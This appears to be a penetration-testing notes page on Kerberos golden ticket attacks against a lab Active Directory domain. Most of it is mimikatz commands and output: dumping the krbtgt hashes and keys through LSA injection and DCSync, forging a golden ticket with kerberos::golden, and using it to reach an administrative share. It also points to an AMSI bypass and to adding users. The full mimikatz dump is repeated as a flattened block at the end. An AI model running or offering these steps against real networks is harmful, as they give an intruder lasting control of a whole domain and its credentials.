Golden Ticket Attacks

What is it?

When we compromise the krbtgt account, we own the domain
We can request access to any resource or system on the domain
Golden tickets == complete access to every machine

Requirements to do the Golden Ticket Attack

We need information about krbtgt account.

NTLM Hash
Domain SID

C:\Users\Administrator>C:\Users\Administrator\Downloads\mimikatz_trunk\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : MARVEL / S-1-5-21-817282392-3664699690-768258319

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : e2862946500528c91a1bc952806f1f6d
    LM   :
  Hash NTLM: e2862946500528c91a1bc952806f1f6d
    ntlm- 0: e2862946500528c91a1bc952806f1f6d
    lm  - 0: ab0c4fe79d001397eeaeabec8c6a65dc

 * WDigest
    01  50bdc43e530f2785fd2ddbf04232f0b0
    02  d2c47afcdd3f4f124bc3cab78d6a097f
    03  f0754118189d06b4ced69310a6e86b98
    04  50bdc43e530f2785fd2ddbf04232f0b0
    05  d2c47afcdd3f4f124bc3cab78d6a097f
    06  66c6e7d86e2bb2676cda3483d65bd620
    07  50bdc43e530f2785fd2ddbf04232f0b0
    08  88e6ccda878ff94edbe7a95183bdfedd
    09  184cf6c89733fa8b1f0c4b254207d902
    10  ac06c941454b764424db46790116043d
    11  5707a0bb4b9450028f658ec8ed6b0a96
    12  184cf6c89733fa8b1f0c4b254207d902
    13  4f1f90dad2001598251781bec3317df7
    14  5707a0bb4b9450028f658ec8ed6b0a96
    15  1bbfd030822063491df4bf7bbe17b486
    16  6b2625f78b64c1eb51db6465f15cff56
    17  efd3a9c79d4cf5ef5a4f9a1adc6a671f
    18  9e0ba9b60058f03c4f830917f0168188
    19  b524ae6efcdc086d7f1b6be1ff68c57c
    20  42b0da52d6ad34f66d2af3bfdcf89714
    21  96a3f7431741bb58364a45bf1f415291
    22  96a3f7431741bb58364a45bf1f415291
    23  b921d7d19b70d3f123c65d903f42201f
    24  65157e48b9f3f56bc02c11767eac7b12
    25  99babae319fe5ad6d2b5ecd2e6e07030
    26  5e84ed4dc6c0440fc9fd2704a1060728
    27  e4b5fd2d9116fc0b81b7c275a7f31ed0
    28  b53347649d3d182947254b3d518cb367
    29  f041d125177de79a9f640b001fd72350

 * Kerberos
    Default Salt : MARVEL.LOCALkrbtgt
    Credentials
      des_cbc_md5       : d391ecb5dc9e9ec7

 * Kerberos-Newer-Keys
    Default Salt : MARVEL.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 0c6a01772449ba5a73b3e9c142c0059c060cfcafa48867b8493d861917f49ff9
      aes128_hmac       (4096) : dec56d737b6bab7c96a7d8ce326d57f6
      des_cbc_md5       (4096) : d391ecb5dc9e9ec7

 * NTLM-Strong-NTOWF
    Random Value : 054bbf8dc2887cde3f761892508cb6cc

We need the SID of the domain

S-1-5-21-817282392-3664699690-768258319

We need the NTLM hash of the account

e2862946500528c91a1bc952806f1f6d

2nd method to do it

• Extract krbtgt account hash

Invoke-Mimikatz -Command '"lsadump::dcsync /user:cyberwarfare\krbtgt"'

Domain SID

// Some code

Generate a golden ticket

kerberos::golden /User:Admin /domain:marvel.local /sid:S-1-5-21-817282392-3664699690-768258319 /krbtgt:e2862946500528c91a1bc952806f1f6d /id:500

Pass the Golden Ticket

Once we have the ticket we can pass this ticket and can have command line access to every machine.

misc::cmd

dir \\THEPUNISHER\C$

We can also run command prompt with psexec.

We can also add a new user.

Bypass restrictions

AMSI.failamsi.fail

PreviousAttacking Active Directory & NTDS.dit 1 NextSilver Ticket

Last updated 4 months ago

C:\Users\Administrator>C:\Users\Administrator\Downloads\mimikatz_trunk\x64\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # lsadump::lsa /inject /name:krbtgt Domain : MARVEL / S-1-5-21-817282392-3664699690-768258319 RID : 000001f6 (502) User : krbtgt * Primary NTLM : e2862946500528c91a1bc952806f1f6d LM : Hash NTLM: e2862946500528c91a1bc952806f1f6d ntlm- 0: e2862946500528c91a1bc952806f1f6d lm - 0: ab0c4fe79d001397eeaeabec8c6a65dc * WDigest 01 50bdc43e530f2785fd2ddbf04232f0b0 02 d2c47afcdd3f4f124bc3cab78d6a097f 03 f0754118189d06b4ced69310a6e86b98 04 50bdc43e530f2785fd2ddbf04232f0b0 05 d2c47afcdd3f4f124bc3cab78d6a097f 06 66c6e7d86e2bb2676cda3483d65bd620 07 50bdc43e530f2785fd2ddbf04232f0b0 08 88e6ccda878ff94edbe7a95183bdfedd 09 184cf6c89733fa8b1f0c4b254207d902 10 ac06c941454b764424db46790116043d 11 5707a0bb4b9450028f658ec8ed6b0a96 12 184cf6c89733fa8b1f0c4b254207d902 13 4f1f90dad2001598251781bec3317df7 14 5707a0bb4b9450028f658ec8ed6b0a96 15 1bbfd030822063491df4bf7bbe17b486 16 6b2625f78b64c1eb51db6465f15cff56 17 efd3a9c79d4cf5ef5a4f9a1adc6a671f 18 9e0ba9b60058f03c4f830917f0168188 19 b524ae6efcdc086d7f1b6be1ff68c57c 20 42b0da52d6ad34f66d2af3bfdcf89714 21 96a3f7431741bb58364a45bf1f415291 22 96a3f7431741bb58364a45bf1f415291 23 b921d7d19b70d3f123c65d903f42201f 24 65157e48b9f3f56bc02c11767eac7b12 25 99babae319fe5ad6d2b5ecd2e6e07030 26 5e84ed4dc6c0440fc9fd2704a1060728 27 e4b5fd2d9116fc0b81b7c275a7f31ed0 28 b53347649d3d182947254b3d518cb367 29 f041d125177de79a9f640b001fd72350 * Kerberos Default Salt : MARVEL.LOCALkrbtgt Credentials des_cbc_md5 : d391ecb5dc9e9ec7 * Kerberos-Newer-Keys Default Salt : MARVEL.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : 0c6a01772449ba5a73b3e9c142c0059c060cfcafa48867b8493d861917f49ff9 aes128_hmac (4096) : dec56d737b6bab7c96a7d8ce326d57f6 des_cbc_md5 (4096) : d391ecb5dc9e9ec7 * NTLM-Strong-NTOWF Random Value : 054bbf8dc2887cde3f761892508cb6cc